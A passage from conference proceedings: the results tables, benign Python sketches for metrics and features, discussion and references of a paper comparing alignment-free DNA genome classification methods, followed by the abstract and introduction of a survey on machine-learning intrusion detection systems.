RHISPECG     0.9962  0.9886  0.9962  0.9771  0.9924  0.9801
HPVGENCG     0.9173  0.8844  0.9200  0.9200  0.8786  0.8828
Primates     0.9234  0.9235  0.8727  0.9235  0.9646  0.8727
Dengue       1       1       1       1       0.999   0.998
Protists     0.8893  0.9679  0.8893  1       1       1
Fungi        0.9574  0.9108  0.8829  0.8792  0.9157  0.9110
Plants       0.9152  0.8857  0.9152  0.8823  0.9429  0.9717
Amphibians   0.9617  0.9457  0.9277  0.9819  0.9381  0.8974
Insects      0.9105  0.9046  0.8656  0.8801  0.8316  0.8091
Vertebrates  0.984   0.981   0.965   0.9573  0.9289  0.9510
Table 6. We show the f1-scores of LBP and MLBP, using Support Vector Machine (SVM), Random Forest Classifier (RFC), and K-Nearest Neighbors (KNN)
Dataset      LBP-SVM  LBP-RFC  LBP-KNN  MLBP-SVM  MLBP-RFC  MLBP-KNN
HIVGRPCG     1        0.8685   0.9892   1         0.7940    0.9776
HIVSUBCG     1        0.7932   0.9958   1         0.6060    0.9860
HIVSUBPOL    1        0.62966  0.9834   1         0.4000    0.9800
EBOSCPECG    1        0.9966   0.9977   1         0.9777    1
HBVGENCG     1        0.7933   0.9830   1         0.8324    1
RHISPECG     1        0.8421   0.9801   1         0.9141    0.9961
HPVGENCG     1        0.9797   1        1         0.9457    1
Primates     1        0.9601   1        1         0.9198    1
Dengue       1        0.7866   0.9929   1         0.9767    0.9985
Protists     1        0.9523   1        1         0.9578    0.9894
Fungi        1        0.9555   0.9888   1         0.9777    1
Plants       1        0.9904   1        1         0.9917    1
Amphibians   1        0.9300   1        1         0.9195    1
Insects      1        0.7960   0.9786   1         0.7035    0.9897
Vertebrates  1        0.7510   0.9862   1         0.8536    0.9930
Table 7. We show the f1-scores of FOS and GLCM, using Support Vector Machine (SVM), Random Forest Classifier (RFC), and K-Nearest Neighbors (KNN)
Dataset      FOS-SVM  FOS-RFC  FOS-KNN  GLCM-SVM  GLCM-RFC  GLCM-KNN
HIVGRPCG     1        0.7954   1        1         0.6803    0.9891
HIVSUBCG     1        1        0.9958   1         0.9820    0.9958
HIVSUBPOL    1        0.5316   0.9901   1         0.4000    0.9800
EBOSCPECG    1        1        0.9988   1         0.9909    1
HBVGENCG     1        0.6657   0.9963   1         0.7140    0.9927
RHISPECG     1        0.7982   0.9556   1         0.7830    0.9917
HPVGENCG     1        0.8045   1        1         0.7751    0.9933
Primates     1        0.9887   0.9887   1         0.9712    0.9889
Dengue       1        0.7866   0.9929   1         0.8820    0.9944
Protists     1        0.7911   1        1         0.7975    1
Fungi        1        0.9555   0.9888   1         0.8228    0.9926
Plants       1        0.9904   1        1         0.8834    0.9806
Amphibians   1        0.9300   1        1         0.7862    0.9913
Insects      1        0.6539   0.9943   1         0.6593    0.9871
Vertebrates  0.9988   0.9949   0.9949   1         0.7786    0.9946
Table 8. We show the best results extracted from Tables 3, 6, and 7
Dataset      Kameris  Castor  FOS-SVM  GLCM-SVM  LBP-SVM  MLBP-SVM  VGG19
HIVGRPCG     1        1       1        1         1        1         1
HIVSUBCG     1        1       1        1         1        1         0.983
HIVSUBPOL    0.993    0.993   1        1         1        1         0.925
EBOSCPECG    1        1       1        1         1        1         1
HBVGENCG     1        1       1        1         1        1         0.955
RHISPECG     1        1       1        1         1        1         1
HPVGENCG     1        1       1        1         1        1         1
Primates     1        1       1        1         1        1         0.923
Dengue       1        1       1        1         1        1         1
Protists     1        1       1        1         1        1         0.937
Fungi        1        1       1        1         1        1         0.978
Plants       0.882    0.972   1        1         1        1         0.790
Amphibians   1        1       1        1         1        1         0.965
Insects      0.994    0.994   1        1         1        1         0.931
Vertebrates  0.998    0.998   0.998    1         1        1         0.987
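The f1-scores reported in Tables 3 to 8 are computed from the TP, FP, and FN counts defined before Sect. 4.3. A minimal Python sketch of that computation follows. It assumes that the per-class scores are macro-averaged over the classes of a dataset. The averaging scheme is not stated in this section, and the function names are illustrative rather than taken from the authors' code.

```python
from typing import Sequence


def f1_per_class(y_true: Sequence[str], y_pred: Sequence[str], label: str) -> float:
    """F1 of one class, computed as 2*TP / (2*TP + FP + FN)."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == label and p == label)
    fp = sum(1 for t, p in pairs if t != label and p == label)
    fn = sum(1 for t, p in pairs if t == label and p != label)
    denom = 2 * tp + fp + fn
    # A class that never appears in labels or predictions scores 0 by convention here.
    return 2 * tp / denom if denom else 0.0


def macro_f1(y_true: Sequence[str], y_pred: Sequence[str]) -> float:
    """Unweighted mean of the per-class F1 scores (assumed averaging scheme)."""
    labels = sorted(set(y_true) | set(y_pred))
    return sum(f1_per_class(y_true, y_pred, lab) for lab in labels) / len(labels)
```

For instance, with true labels A, A, B, B and predictions A, B, B, B, class A has TP = 1, FP = 0, FN = 1 and class B has TP = 2, FP = 1, FN = 0, so the per-class scores are 2/3 and 0.8.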
of CNNs, the generated image, called prediction time. The latter is the sum of the feature vector generation time and the time taken for the prediction itself. For Kameris and Castor, we measured the processing time to obtain the feature vectors. Additionally, to generate the FCGR image based on Intelligent Icons
we calculated the processing time with eight random sequences. Castor had the best processing time. Table 9 details the prediction time. Kameris and Castor outperformed the CNNs in processing time. They also obtained better times than the image descriptor methods, because those four methods used SVM, KNN, and RFC as classifiers. Resnet-50 obtained times close to those of Castor and Kameris, and was better in some cases. Furthermore, Table 13 presents the feature vector generation time. Tables 10, 11, and 12 report the prediction times of the image descriptor methods using SVM, RFC, and KNN. FOS obtained the best prediction time compared with GLCM, LBP, and MLBP, with MLBP being by far the slowest. Likewise, FOS and GLCM obtained times similar to those of the CNNs, and slightly better than Castor and Kameris. The database that consumed the most time and resources was Plants because, despite having a small number of sequences compared with the other databases, its genomes are large.
Table 9. We present the time in milliseconds to perform predictions with Kameris, Castor, VGG16, VGG19, Resnet-50, and Inception-v3
Dataset      Kameris   Castor    VGG16    VGG19    Resnet-50  Inception-v3  Sequence length
HIVGRPCG     319.781   141.021   517.062  629.199  149.530    372.776       8654
HIVSUBCG     297.834   133.746   526.036  632.170  148.749    370.247       8589
HIVSUBPOL    43.919    20.018    514.573  643.902  147.104    370.454       1017
EBOSPECG     642.427   283.368   522.682  633.308  146.739    368.756       18828
HBVGENCG     113.392   50.541    518.405  626.492  149.673    375.796       3182
RHISPECG     13.916    6.625     516.140  634.218  147.387    370.164       369
HPVGENCG     266.930   117.776   512.843  633.415  157.982    369.680       7100
Primates     579.338   254.598   524.119  628.240  146.379    376.814       16499
Dengue       348.030   157.447   515.302  632.949  148.390    380.846       10313
Protists     1105.138  490.876   513.511  629.238  153.244    373.343       24932
Fungi        1642.195  717.410   511.470  627.220  147.211    370.570       190834
Plants       5515.720  2443.862  516.660  626.762  147.379    373.236       103830
Amphibians   567.987   252.171   516.356  634.881  153.083    374.721       16101
Insects      531.752   233.795   513.336  635.343  147.526    372.987       14711
Vertebrates  562.125   263.150   513.335  626.717  149.502    374.435       16442
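The two kinds of processing time described in this section can be measured with a small timing harness. The Python sketch below is only an illustration under stated assumptions: `extract` and `predict` are hypothetical callables standing in for a feature extractor and a trained classifier, and the mean over the repetitions is reported, although the section does not say how the 10 executions were aggregated.

```python
import time
from statistics import mean
from typing import Callable, Dict, List, Sequence


def time_ms(fn: Callable[[], object], repetitions: int = 10) -> float:
    """Mean wall-clock time of fn() in milliseconds over `repetitions` runs."""
    samples: List[float] = []
    for _ in range(repetitions):
        start = time.perf_counter()
        fn()
        samples.append((time.perf_counter() - start) * 1000.0)
    return mean(samples)


def processing_times(
    sequences: Sequence[str],
    extract: Callable[[str], object],   # hypothetical feature extractor
    predict: Callable[[object], object],  # hypothetical trained classifier
    repetitions: int = 10,
) -> Dict[str, float]:
    """Return feature generation time and prediction time, both in milliseconds."""
    features: List[object] = []

    def run_extract() -> None:
        features.clear()
        features.extend(extract(s) for s in sequences)

    generation_ms = time_ms(run_extract, repetitions)
    classify_ms = time_ms(lambda: [predict(f) for f in features], repetitions)
    # Prediction time is the generation time plus the time of the prediction itself.
    return {
        "generation_ms": generation_ms,
        "prediction_ms": generation_ms + classify_ms,
    }
```

Using `time.perf_counter` rather than `time.time` gives a monotonic, high-resolution clock, which matters when some feature vectors take only a few milliseconds to generate.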
5 Discussion
In this work, we carried out experiments to determine which alignment-free methods are better in two respects: f1-score and processing time. We were
Table 10. We present the time in milliseconds to perform predictions with FOS, GLCM, LBP, and MLBP, using the SVM algorithm
Dataset      FOS-SVM   GLCM-SVM  LBP-SVM    MLBP-SVM    Sequence length
HIVGRPCG     407.311   668.111   3622.970   3724.500    8654
HIVSUBCG     398.828   680.570   3569.309   10125.360   8589
HIVSUBPOL    191.670   450.070   622.404    1540.680    1017
EBOSCPECG    665.550   910.982   7185.070   20750.720   18828
HBVGENCG     255.128   507.173   1343.540   3765.345    3182
RHISPECG     167.250   430.730   166.426    580.290     369
HPVGENCG     360.140   635.323   3022.705   8838.360    7100
Primates     580.250   860.828   6412.801   19360.160   16499
Dengue       440.207   709.300   4008.250   12140.751   10313
Protists     1005.820  1240.820  6412.820   36001.032   24932
Fungi        1480.750  1640.750  18105.190  53434.640   190834
Plants       4800.755  4711.190  61409.530  180510.82   103830
Amphibians   630.450   950.326   6270.190   18939.231   16101
Insects      571.800   847.900   6060.421   17859.780   14711
Vertebrates  455.203   711.365   6130.20    18750.111   16442
Table 11. We present the time in milliseconds to perform predictions with FOS, GLCM, LBP, and MLBP, using the RFC algorithm
Dataset      FOS-RFC   GLCM-RFC  LBP-RFC    MLBP-RFC    Sequence length
HIVGRPCG     407.310   665.107   3625.855   3712.500    8654
HIVSUBCG     398.815   679.470   3572.318   10112.360   8589
HIVSUBPOL    191.675   449.111   630.414    1545.680    1017
EBOSCPECG    665.555   908.979   7182.070   20758.720   18828
HBVGENCG     255.130   502.170   1344.540   3775.345    3182
RHISPECG     166.249   428.725   160.426    599.290     369
HPVGENCG     350.142   633.330   3025.710   8988.360    7100
Primates     575.255   859.825   6480.810   19356.162   16499
Dengue       435.214   704.315   4010.255   12142.751   10313
Protists     1001.814  1245.828  6412.608   36001.032   24932
Fungi        1475.715  1641.753  18115.290  53432.640   190834
Plants       4678.740  4718.195  61403.531  180508.82   103830
Amphibians   625.440   955.322   6230.190   18926.231   16101
Insects      565.798   843.920   6050.421   17840.780   14711
Vertebrates  455.201   713.368   6115.20    18725.110   16442
Table 12. We present the time in milliseconds to perform predictions with FOS, GLCM, LBP, and MLBP, using the KNN algorithm
Dataset      FOS-KNN   GLCM-KNN  LBP-KNN    MLBP-KNN    Sequence length
HIVGRPCG     407.320   665.117   3615.680   3726.500    8654
HIVSUBCG     398.818   679.495   3572.320   10131.360   8589
HIVSUBPOL    191.692   449.131   615.414    1559.680    1017
EBOSCPECG    665.585   908.985   7299.070   20798.720   18828
HBVGENCG     255.145   510.175   1515.540   3780.345    3182
RHISPECG     169.251   435.735   176.426    650.290     369
HPVGENCG     368.140   638.392   3049.710   9001.360    7100
Primates     575.260   859.801   6499.810   22152.312   16499
Dengue       440.215   692.307   4068.255   12590.746   10313
Protists     1015.822  1230.815  6445.608   36015.078   24932
Fungi        1480.710  1615.712  18215.290  53440.656   190834
Plants       4678.722  4722.184  61349.531  180512.815  103830
Amphibians   615.440   912.398   6267.190   19126.231   16101
Insects      592.805   898.915   6117.421   18440.640   14711
Vertebrates  465.215   765.334   6132.20    18712.220   16442
able to infer that the image descriptor methods achieve better results, although in processing time Castor and Resnet-50 were the fastest. By contrast, MLBP was by far the slowest. For example, in Table 10, where the image descriptor methods use SVM, MLBP took 180510.82 milliseconds on the Plants database, which has very large genomes, despite having obtained a good f1-score. Additionally, for feature vector generation alone (Table 13), Castor has the best time in all cases. Finally, we noticed that FOS has the best prediction times among the image descriptor methods. This might be because the method is related to k-mers and processes the data more easily. Additionally, Castor and Kameris had very close results despite using only SVM as a classifier, but the image descriptor methods reached an f1-score of 100% in almost all cases, surpassing them. Moreover, the CNNs do not reach the level of SVM, which we attribute to the lack of samples or public databases to train them.
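To make the notion of a first-order statistics (FOS) descriptor concrete, the Python sketch below computes a commonly used set of first-order features from the gray-level histogram of an image. It is an assumption-laden illustration: this section does not specify which image is built from each sequence or which statistics the evaluated FOS method uses, so the feature set (mean, variance, skewness, kurtosis, energy, entropy) and the function name are hypothetical.

```python
import math
from typing import Dict, Sequence


def first_order_statistics(
    image: Sequence[Sequence[int]], levels: int = 256
) -> Dict[str, float]:
    """First-order statistics of a grayscale image with values in [0, levels)."""
    pixels = [p for row in image for p in row]
    n = len(pixels)

    # Normalized gray-level histogram: probs[i] is the fraction of pixels at level i.
    hist = [0] * levels
    for p in pixels:
        hist[p] += 1
    probs = [h / n for h in hist]

    mean = sum(i * p for i, p in enumerate(probs))
    variance = sum((i - mean) ** 2 * p for i, p in enumerate(probs))
    std = math.sqrt(variance)
    third = sum((i - mean) ** 3 * p for i, p in enumerate(probs))
    fourth = sum((i - mean) ** 4 * p for i, p in enumerate(probs))

    return {
        "mean": mean,
        "variance": variance,
        # Standardized moments are set to 0 for a constant image (std == 0).
        "skewness": third / std ** 3 if std else 0.0,
        "kurtosis": fourth / std ** 4 if std else 0.0,
        "energy": sum(p * p for p in probs),
        "entropy": -sum(p * math.log2(p) for p in probs if p > 0),
    }
```

Because every feature is derived from a single pass over the histogram, the cost grows linearly with the number of pixels, which is consistent with FOS being the fastest of the four image descriptors in Tables 10 to 13.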
6 Limitations
In this study, we noticed that FCGR image generation takes considerably more time as the length of the k-mer increases. Specifically, with k = 5, a more powerful GPU and a larger amount of RAM would be needed to generate the images and to train the CNNs. Likewise, for the second part of the work, which consists of training the CNNs with the FCGR images, more
computational capacity is needed, both in RAM and in the GPU, because beyond 2000 images CNN training becomes considerably slower. Additionally, when generating the FOS, GLCM, LBP, and MLBP feature vectors, we noticed that MLBP takes a considerably long time, even though only 8 test sequences and 10 repetitions were used in the experiment. We infer that, if the complete databases were used, the time required would not be acceptable.
Table 13. Processing time in milliseconds. We show the processing time to generate the feature vectors of Kameris and Castor, and the image generation time in the case of FCGR, inspired by the Intelligent Icons paper. We also present the processing time to generate the feature vectors of FOS, GLCM, LBP, and MLBP. We used 8 random sequences for all cases, and 5-mers for Kameris, Castor, and the FCGR image generation. The processing time was obtained after executing each case 10 times
Dataset      Kameris   Castor    Image generation  FOS       GLCM      LBP        MLBP        Sequence length
HIVGRPCG     319.603   140.910   7962.560          267.606   556.720   3394.642   10176.645   8654
HIVSUBCG     297.660   133.637   8097.371          254.532   523.795   3244.866   9763.489    8589
HIVSUBPOL    43.790    19.893    7993.734          53.488    306.918   466.795    1363.745    1017
EBOSCPECG    642.282   283.257   8039.344          508.603   787.700   7005.136   20454.488   18828
HBVGENCG     113.221   50.438    7884.267          104.132   399.19    1184.879   3616.148    3182
RHISPECG     13.796    6.53064   8211.903          29.710    328.248   140.611    410.564     369
HPVGENCG     266.754   117.668   7980.977          222.328   509.008   2862.636   8559.799    7100
Primates     579.158   254.484   8047.256          457.480   709.668   6123.200   18092.78    16499
Dengue       347.867   157.344   7868.328          298.502   586.059   3902.443   11804.980   10313
Protists     1104.980  490.764   8131.914          851.886   1127.297  11279.85   34617.4301  24932
Fungi        1642.013  717.287   8353.357          1269.872  1486.723  17747.163  52737.838   190834
Plants       5515.532  2443.748  9401.827          4412.888  4447.10   60150.70   178225.92   103830
Amphibians   567.823   252.059   7996.048          475.382   719.989   6259.095   18317.007   16101
Insects      531.588   233.682   8086.115          421.914   690.535   5665.195   17387.733   14711
Vertebrates  561.954   263.036   8024.314          458.204   712.370   6132.39    18579.14    16442
Finally, the times in Tables 10, 11, and 12 for predictions using SVM, RFC, and KNN show that FOS and GLCM take slightly longer than the neural networks, Castor, and Kameris. In all these tables, LBP and MLBP are the methods that consumed the most time, in contrast with the excellent f1-scores they obtained.
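The growth of the FCGR cost with k noted in this section follows from the size of the representation: there are 4^k possible k-mers over the alphabet {A, C, G, T}, and an FCGR image of order k has 2^k x 2^k cells. The Python sketch below only counts k-mers and reports those sizes. It is a simplified illustration, not the image generation procedure used in the experiments, and the function names are hypothetical.

```python
from collections import Counter
from itertools import product
from typing import Dict

ALPHABET = "ACGT"


def kmer_counts(sequence: str, k: int) -> Dict[str, int]:
    """Count every k-mer over ACGT in `sequence`; k-mers with other symbols are ignored."""
    seq = sequence.upper()
    observed = Counter(seq[i:i + k] for i in range(len(seq) - k + 1))
    # One entry per possible k-mer, so the vector always has 4**k components.
    return {"".join(p): observed.get("".join(p), 0) for p in product(ALPHABET, repeat=k)}


def fcgr_side(k: int) -> int:
    """Side length, in cells, of an FCGR image of order k."""
    return 2 ** k
```

With k = 5 the vector has 1024 components (a 32 x 32 image), and with k = 7 it has 16384 components (a 128 x 128 image), so both memory and generation time grow by a factor of four for each unit increase in k.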
7 Conclusions
In this work, we evaluated Kameris, Castor, VGG16, VGG19, Resnet-50, and Inception for DNA genome classification, using different k-mers. Additionally, we experimented with FOS, GLCM, LBP, and MLBP, which did not use k-mers.
We inferred that the methods based on image descriptors are the best performers even though they did not use k-mers, obtaining 100% in almost all predictions with SVM, followed by Kameris and Castor. The CNNs ranked last, with VGG19 being the most representative CNN. Finally, we observed that Castor had the best processing time. By contrast, FCGR image generation and MLBP processing took a lot of time. Moreover, FOS (the best image descriptor) obtained a time close to that of Kameris, which is a relevant result.
8 Future Work
In this work, FOS, GLCM, LBP, and MLBP performed better than Kameris, Castor, and the CNNs in most cases. Nevertheless, the databases contain few samples, and the number of classes differs between databases. To perform better experiments, we will build a new dataset and evaluate more sophisticated deep learning techniques.
References 1. Abd-Alhalem, S.M., et al.: DNA sequences classification with deep learning: a survey. Menoufia J. Electron. Eng. Res. 30(1), 41–51 (2021) 2. Almeida, J.S., Carrico, J.A., Maretzek, A., Noble, P.A., Fletcher, M.: Analysis of genomic sequences by chaos game representation. Bioinformatics 17(5), 429–437 (2001) 3. Bakheet, S., Al-Hamadi, A.: Automatic detection of Covid-19 using pruned GLCMbased texture features and LDCRF classification. Comput. Biol. Med. 137, 104781 (2021) 4. Barburiceanu, S., Terebes, R., Meza, S.: 3D texture feature extraction and classification using GLCM and LBP-based descriptors. Appl. Sci. 11(5), 2332 (2021) 5. Campagna, D., et al.: Rap: a new computer program for de novo identification of repeated sequences in whole genomes. Bioinformatics 21(5), 582–588 (2005) 6. Chen, W., Liao, B., Li, W.: Use of image texture analysis to find DNA sequence similarities. J. Theor. Biol. 455, 1–6 (2018) 7. Choi, J.Y., Kim, D.H., Choi, S.H., Ro, Y.M.: Multiresolution local binary pattern texture analysis for false positive reduction in computerized detection of breast masses on mammograms. In: Medical Imaging 2012: Computer-Aided Diagnosis, vol. 8315, pp. 676–682. SPIE (2012) 8. Riccardo Concu and MNDS Cordeiro: Alignment-free method to predict enzyme classes and subclasses. Int. J. Molec. Sci. 20(21), 5389 (2019) 9. Cores, F., Guirado, F., Lerida, J.L.: High throughput blast algorithm using spark and cassandra. J. Supercomput. 77, 1879–1896 (2021) 10. Deliba¸s, E., Arslan, A.: DNA sequence similarity analysis using image texture analysis based on first-order statistics. J. Molec. Graph. Model. 99, 107603 (2020) 11. Deschavanne, P.J., Giron, A., Vilain, J., Fagot, G., Fertil, B.: Genomic signature: characterization and classification of species assessed by chaos game representation of sequences. Molec. Biol. Evol. 16(10), 1391–1399 (1999)
56
D. P. Cussi and V. E. Machaca Arceda
12. Dogan, B.: An alignment-free method for bulk comparison of protein sequences from different species. Balkan J. Electr. Comput. Eng. 7(4), 405–416 (2019) 13. Fabija´ nska, A., Grabowski, S.: Viral genome deep classifier. IEEE Access 7, 81297– 81307 (2019) 14. Gao, Y., Li, T., Luo, L.: Phylogenetic study of 2019-ncov by using alignment-free method. arXiv preprint arXiv:2003.01324 (2020) 15. Gollery, M.: Bioinformatics: sequence and genome analysis. Clin. Chem. 51(11), 2219–2220 (2005) 16. Gunasekaran, H., Ramalakshmi, K., Arokiaraj, A.R.M., Kanmani, S.D., Venkatesan, C., Dhas, C.S.G.: Analysis of DNA sequence classification using CNN and hybrid models. Comput. Math. Methods Med. 2021 (2021) 17. Hammad, M.S., Ghoneim, V.F., Mabrouk, M.S.: Detection of Covid-19 using genomic image processing techniques. In: 2021 3rd Novel Intelligent and Leading Emerging Sciences Conference (NILES), pp. 83–86. IEEE (2021) 18. He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 770–778 (2016) 19. He, L., Dong, R., He, R.L., Yau, S.S.-T.: A novel alignment-free method for hiv-1 subtype classification. Infect. Genet. Evol. 77, 104080 (2020) 20. Kaur, N., Nazir, N., et al.: A review of local binary pattern based texture feature extraction. In: 2021 9th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions)(ICRITO), pp. 1–4. IEEE (2021) 21. Keogh, E., Wei, L., Xi, X., Lonardi, S., Shieh, J., Sirowy, S. Intelligent icons: integrating lite-weight data mining and visualization into gui operating systems. In: Sixth International Conference on Data Mining (ICDM 2006), pp. 912–916. IEEE (2006) 22. Kola, D.G.R., Samayamantula, S.K.: A novel approach for facial expression recognition using local binary pattern with adaptive window. Multimedia Tools Appl. 80(2), 2243–2262 (2021) 23. 
Kouchaki, S., Tapinos, A., Robertson, D.L.: A signal processing method for alignment-free metagenomic binning: multi-resolution genomic binary patterns. Sci. Rep. 9(1), 1–10 (2019) 24. Kumar, N., Lolla, V.N., Keogh, E., Lonardi, S., Ratanamahatana, C.A., Wei, L.: Time-series bitmaps: a practical visualization tool for working with large time series databases. In: Proceedings of the 2005 SIAM International Conference on Data Mining, pp. 531–535. SIAM (2005) 25. Lebatteux, D., Remita, A.M., Diallo, A.B.: Toward an alignment-free method for feature extraction and accurate classification of viral sequences. J. Comput. Biol. 26(6), 519–535 (2019) 26. Lee, B., Smith, D.K., Guan, Y.: Alignment free sequence comparison methods and reservoir host prediction. Bioinformatics 37, 3337–3342 (2021) 27. Leinonen, M., Salmela, L.: Extraction of long k-mers using spaced seeds. arXiv preprint arXiv:2010.11592 (2020) 28. Li, Y., Li, L.-P., Wang, L., Chang-Qing, Yu., Wang, Z., You, Z.-H.: An ensemble classifier to predict protein-protein interactions by combining pssm-based evolutionary information with local binary pattern model. Int. J. Molec. Sci. 20(14), 3511 (2019) 29. Lichtblau, D.: Alignment-free genomic sequence comparison using fcgr and signal processing. BMC Bioinf. 20(1), 1–17 (2019)
DNA Genome Classification
57
30. Liu, Z., Gao, J., Shen, Z., Zhao, F.: Design and implementation of parallelization of blast algorithm based on spark. DEStech Trans. Comput. Sci. Eng. (IECE) (2018) 31. Arceda, V.E.M.: An analysis of k-mer frequency features with svm and cnn for viral subtyping classification. J. Comput. Sci. Technol. 20 (2020) 32. Mahmoud, M.A.B., Guo, P.: DNA sequence classification based on mlp with pilae algorithm. Soft Comput. 25(5), 4003–4014 (2021) 33. Mohan, N., Varshney, N.: Facial expression recognition using improved local binary pattern and min-max similarity with nearest neighbor algorithm. In: Tiwari, S., Trivedi, M.C., Mishra, K.K., Misra, A.K., Kumar, K.K., Suryani, E. (eds.) Smart Innovations in Communication and Computational Sciences. AISC, vol. 1168, pp. 309–319. Springer, Singapore (2021). https://doi.org/10.1007/978-981-15-53455 28 ¨ urk, S 34. Ozt¨ ¸ , Akdemir, B.: Application of feature extraction and classification methods for histopathological image using glcm, lbp, lbglcm, glrlm and sfta. Procedia Comput. Sci. 132, 40–46 (2018) 35. Panthakkan, A., Anzar, S.M., Al Mansoori, S., Al Ahmad, H.: Accurate prediction of covid-19 (+) using ai deep vgg16 model. In: 2020 3rd International Conference on Signal Processing and Information Security (ICSPIS), pp. 1–4. IEEE (2020) 36. Prakasa, E.: Texture feature extraction by using local binary pattern. INKOM J. 9(2), 45–48 (2016) 37. Pratas, D., Silva, R.M., Pinho, A.J., Ferreira, P.J.S.C.: An alignment-free method to find and visualise rearrangements between pairs of dna sequences. Sci. Rep. 5(1), 1–9 (2015) 38. Pratiwi, M., Harefa, J., Nanda, S., et al.: Mammograms classification using graylevel co-occurrence matrix and radial basis function neural network. Procedia Comput. Sci. 59, 83–91 (2015) 39. Randhawa, G.S., Hill, K.A., Kari, L.: Ml-dsp: machine learning with digital signal processing for ultrafast, accurate, and scalable genome classification at all taxonomic levels. BMC Genom. 20(1), 1–21 (2019) 40. 
Ranganathan, S., Nakai, K., Schonbach, C.: Encyclopedia of Bioinformatics and Computational Biology. ABC of Bioinformatics. Elsevier (2018) 41. Ren, J., et al.: Identifying viruses from metagenomic data using deep learning. Quant. Biol. 8, 1–14 (2020) 42. Rosenberg, M.S.: Sequence Alignment: Methods, Models, Concepts, and Strategies. University of California Press (2009) 43. Ruichek, Y., et al.: Attractive-and-repulsive center-symmetric local binary patterns for texture classification. Eng. Appl. Artif. Intell. 78, 158–172 (2019) 44. Bhavya, S.V., Narasimha, G.R., Ramya, M., Sujana, Y.S., Anuradha, T.: Classification of skin cancer images using tensorflow and inception v3. Int. J. Eng. Technol. 7, 717–721 (2018) 45. Santamar´ıa, L.A., Zu˜ niga, S., Pineda, I.H., Somodevilla, M.J., Rossainz, M.: Reconocimiento de genes en secuencias de adn por medio de im´ agenes. DNA sequence recognition using image representation. Res. Comput. Sci. 148, 105–114 (2019) 46. Shanan, N.A.A., Lafta, H.A., Alrashid, S.Z.: Using alignment-free methods as preprocessing stage to classification whole genomes. Int. J. Nonlinear Anal. Appl. 12(2), 1531–1539 (2021) 47. Sharifnejad, M., Shahbahrami, A., Akoushideh, A., Hassanpour, R.Z.: Facial expression recognition using a combination of enhanced local binary pattern and pyramid histogram of oriented gradients features extraction. IET Image Process. 15(2), 468–478 (2021)
58
D. P. Cussi and V. E. Machaca Arceda
48. Simonyan, K., Zisserman, A.: Very deep convolutional networks for large-scale image recognition. arXiv preprint arXiv:1409.1556 (2014) 49. Singh, P., Verma, P., Singh, N.: Offline signature verification: an application of glcm features in machine learning. Ann. Data Sci. 96, 1–13 (2021) 50. Solis-Reyes, S., Avino, M., Poon, A., Kari, L.: An open-source k-mer based machine learning tool for fast and accurate subtyping of hiv-1 genomes. PloS One 13(11), e0206409 (2018) 51. Sultana, M., Bhatti, M.N.A., Javed, S., Jung, S.-K.: Local binary pattern variantsbased adaptive texture features analysis for posed and nonposed facial expression recognition. J. Electron. Imaging 26(5), 053017 (2017) 52. Szegedy, C., et al.: Going deeper with convolutions. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 1–9 (2015) 53. Szegedy, C., Vanhoucke, V., Ioffe, S., Shlens, J., Wojna, Z.: Rethinking the inception architecture for computer vision. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2818–2826 (2016) 54. Tello-Mijares, S., Woo, L.: Computed tomography image processing analysis in covid-19 patient follow-up assessment. J. Healthcare Eng. 2021 (2021) 55. Vu, H.N., Nguyen, M.H., Pham, C.: Masked face recognition with convolutional neural networks and local binary patterns. Appl. Intell. 52(5), 5497–5512 (2022) 56. Wang, H., Li, L., Zhou, C., Lin, H., Deng, D.: Spark-based parallelization of basic local alignment search tool. Int. J. Bioautom. 24(1), 87 (2020) 57. Wood, D.E., Salzberg, S.L.: Kraken: ultrafast metagenomic sequence classification using exact alignments. Genome Biol. 15(3), 1–12 (2014) 58. Yang, F., Ying-Ying, X., Wang, S.-T., Shen, H.-B.: Image-based classification of protein subcellular location patterns in human reproductive tissue by ensemble learning global and local features. Neurocomputing 131, 113–123 (2014) 59. 
Youssef, K., Feng, W.: Sparkleblast: scalable parallelization of blast sequence alignment using spark. In: 2020 20th IEEE/ACM International Symposium on Cluster, Cloud and Internet Computing (CCGRID), pp. 539–548. IEEE (2020) 60. Zielezinski, A., Vinga, S., Almeida, J., Karlowski, W.M.: Alignment-free sequence comparison: benefits, applications, and tools. Genome Biol. 18(1), 1–17 (2017)
A Review of Intrusion Detection Systems Using Machine Learning: Attacks, Algorithms and Challenges
Jose Luis Gutierrez-Garcia1, Eddy Sanchez-DelaCruz2(B), and Maria del Pilar Pozos-Parra3
1 National Technological of Mexico, Campus Misantla and Campus Teziutlan, Misantla, Mexico
2 National Technological of Mexico, Campus Misantla, Misantla, Mexico [email protected]
3 Autonomous University of Baja California, Mexicali, Mexico [email protected]
Abstract. Cybersecurity has become a priority concern of the digital society. Many attacks are becoming more sophisticated, which requires strengthening the strategies for identifying, analyzing, and managing vulnerabilities to stop threats. Intrusion Detection/Prevention Systems are the first security devices to protect systems. This paper presents a survey of several aspects to consider in machine learning-based intrusion detection systems. The survey presents the taxonomy of Intrusion Detection Systems, the types of attacks they face, and the organizational infrastructure to respond to security incidents. It also describes several investigations that detect intrusions using Machine Learning, describing in detail the databases used. Moreover, the most accepted metrics to measure the performance of algorithms are presented. Finally, the challenges are discussed, motivating future research.
Keywords: Intrusion detection systems · Machine learning · Cyber security
1 Introduction
Cybersecurity is the set of technologies and processes to protect computers, networks, programs, and data from attacks, unauthorized access, modification, or destruction, to ensure the confidentiality, integrity, and availability of information [1]. Cybersecurity is critical because our society is digitally connected for everyday activities such as business, health, education, transportation, and entertainment through the internet. The impacts of cyberattacks are observed in the economy and even in the influence on the democracy of a country [2]. Cyberattacks are part of the list of global risks in the report published by the World Economic Forum. This report indicates that 76.1% of respondents expect cyberattacks on critical infrastructure to increase and 75% expect an increase in attacks in search of money or data [3].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 59–78, 2023. https://doi.org/10.1007/978-3-031-28073-3_5
60
J. L. Gutierrez-Garcia et al.
